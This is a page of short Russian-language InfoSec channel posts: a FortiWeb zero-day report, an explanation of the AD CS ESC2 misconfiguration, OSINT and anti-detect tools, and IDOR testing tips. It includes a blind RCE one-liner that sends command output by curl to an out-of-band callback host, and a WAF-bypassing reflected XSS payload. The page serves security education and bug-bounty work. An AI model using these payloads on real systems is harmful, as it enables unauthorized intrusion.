Hacking & InfoSec Portal

Критическая уязвимость в Fortinet FortiWeb используется в реальных атаках для создания админ-аккаунтов Критическая уязвимость в Fortinet FortiWeb (Web Application Firewall, WAF) активно эксплуатируется злоумышленниками и, судя по всему, используется как zero-day. Эксплойт, который предположительно относится к уязвимости в FortiWeb, был выставлен на продажу на одном крупном закрытом хакерском форуме, но связь между ним и текущей уязвимостью пока не подтверждена. При тестировании на версии FortiWeb 8.0.1 (релиз август 2025) успешная эксплуатация возвращает HTTP 200 OK и JSON с данными нового админ-пользователя, включая зашифрованный пароль и назначенные роли/права. 👉 @cybersecinform

Flowsint Современная платформа для визуальных, гибких и расширяемых графовых расследований. Ориентирована на аналитиков и специалистов по кибербезопасности. Репозиторий: github.com/reconurge/flowsint/ 👉 @cybersecinform

Продолжаем разбор ESC-уязвимостей… Сегодня ESC2, довольно частая и критичная неправильная конфигурация в Active Directory Certificate Services. Что такое ESC2? ESC2 — это типовая ошибка настройки в AD CS, когда шаблон сертификата позволяет любому доменному пользователю запросить сертификат, который:

может использоваться для аутентификации без пароля может открыть дорогу к повышению привилегий, вплоть до уровня Domain Admin

Когда шаблон считается уязвимым к ESC2: - У обычных пользователей есть права enroll - Не требуется одобрение менеджера - Не нужен авторизованный подписью запрос - EKU (Extended Key Usage) выставлен в Any Purpose или вообще не задан Если EKU пустой, сертификат начинает вести себя как подчиненный центр сертификации: его можно использовать для подписи других сертификатов под любые задачи. Важное уточнение: Такие «подчиненные» сертификаты по умолчанию не доверены для входа в домен. Контроллеры домена принимают сертификаты только от тех CA, что присутствуют в NTAuth. Но это не делает ESC2 безопасным: Злоумышленник все равно может подписывать другие сертификаты, подделывать код-сайнинг или TLS сертификаты, либо использовать enrollment agent шаблоны, чтобы запрашивать полноценные сертификаты для привилегированных аккаунтов - которым уже доверяют. Так ESC2 приводит к полноценной эскалации прав, несмотря на формальные границы доверия. Почему атакующие любят ESC2: - Легко обнаружить - Не нужны админские права - Трудно отследить — нет перебора паролей, нет явных алертов - Сертификаты живут долго, обеспечивая скрытое присутствие Хочешь проверить свою инфраструктуру? Можно использовать: - ADProbe (инструмент для аудита безопасности) - Locksmith - Certipy - … 👉 @cybersecinform

Хочешь быстро найти все соцсети какого-то пользователя? Глянь на Sherlock. 👉 @cybersecinform

Blind Remote Code Execution POC:

    
        curl -X POST -d "user=$(whoami)" http://BURP_LINK{}
    

Иногда цель уязвима, но никакого вывода не вернет. Так что не забывай гонять запросы через Burp Collaborator, чтобы вытащить результат. Примечание: всегда смотри заголовок User-Agent в ответах Burp Collaborator. Если там всплывает curl, значит у тебя RCE. 👉 @cybersecinform

Cloudflare WAF обход → XSS Уязвимость возникла потому, что URL напрямую выводился в JavaScript. Использовал этот payload для реализации отражённого XSS: --'<00 foo="<a%20href="javascript​:prompt(404)">XSS-Click</00>--%20// 👉 @cybersecinform

Camoufox это минималистичный и незаметный форк Firefox для веб-скрейпинга и не только Фичи:

Полностью невидим для систем обнаружения ботов. Работает лучше многих коммерческих антидетекционных браузеров; Управление fingerprint'ами: можно загружать и ротировать разные fingerprint'ы без JS; Гибкая конфигурация и калибровка: размер экрана, разрешение, размер окна, fingerprint браузера, аппаратные характеристики и прочее; Спуфинг: геолокация, часовой пояс, локаль; подмена шрифтов; WebRTC-спуфинг IP на уровне протокола; Функция имитации движения мыши, похожая на человеческое поведение; Отсутствие CSS-анимаций, встроенная блокировка рекламы, регулярные обновления Firefox.

https://github.com/daijro/camoufox 👉 @cybersecinform

🥷 Ищем InfoSec специалистов. Удалёнка, релокейт платим много! Специально для Вас, собираем лучшие вакансии по InfoSec с прямыми контактами в Telegram на канале @it_match_cybersec Подпишись чтобы не упустить свой шанс получить лучший оффер! ➡️ Посмотреть вакансии

Поговорим про ручное тестирование на IDOR. На фото видно как я вставил пейлоад из редактированного API T-Mobile. На нём бага нет (насколько мне известно), хочу использовать для обучения и это отличный кейс. A: Это параметр в пути URI, представляющий ID организации. Поколдовать с ним нужно. B: Запрос не ожидает URI-параметров, но что если всё-таки подкинуть их, и что-то изменится? C: Изменение пользовательских имён или ID в куках может приводить к изменению поведения. D: Поиграйтесь с Authorization: Bearer токеном. Проверяет ли он подпись? Можно ли изменить данные в нём и чтобы он всё равно работал? Если да, то очень плохо. Вообще используется ли токен, или вместо него смотрят cookie? E: Тут указано "upgrade-app". Что это значит? Какие ещё возможные значения? Что происходит при смене? F: Это ID организации. Тот же, что и в пути URI. Если менять оба одновременно - работает ли? Если менять только один - работает ли? Сверяются ли они между собой? G: Что значит этот заголовок? Там формат JWT? Пошаманить. H: Заявлен тип API. Можно ли его поменять? Тогда можно ли перенаправить на другой бэкенд? I: Почему мой email в заголовке? Могу ли подменить на чужой? Проверяется ли он? J: IDP-тип — интересно. Какие ещё значения принимает? K: Догадались к этому моменту - нужно порыться с именем приложения. Что оно делает? L: О, мой user ID. Интересно, валидируется ли он относительно организации в URI, в заголовке или в теле? M: Снова мой user ID. Что если поменять M, но не L; или L, но не M; или оба; или оставить; или сделать пустым/null? N: Номер счёта. Валидируется ли он относительно org, user, ни по одному, по обоим? O: OrgID снова, также в F и A. Три места. Все ли три проверяются? Только один? Ни один? Почему всё так сложно? Если вынести главное: поймите сложность возможных комбинаций/пермутаций тестов для ОДНОГО POST на ОДНОМ эндпоинте API. Это путь. Ах да, и нужно проверить каждое поле на SQLi, SSRF и выполнение кода. Очевидно. 🤣 👉 @cybersecinform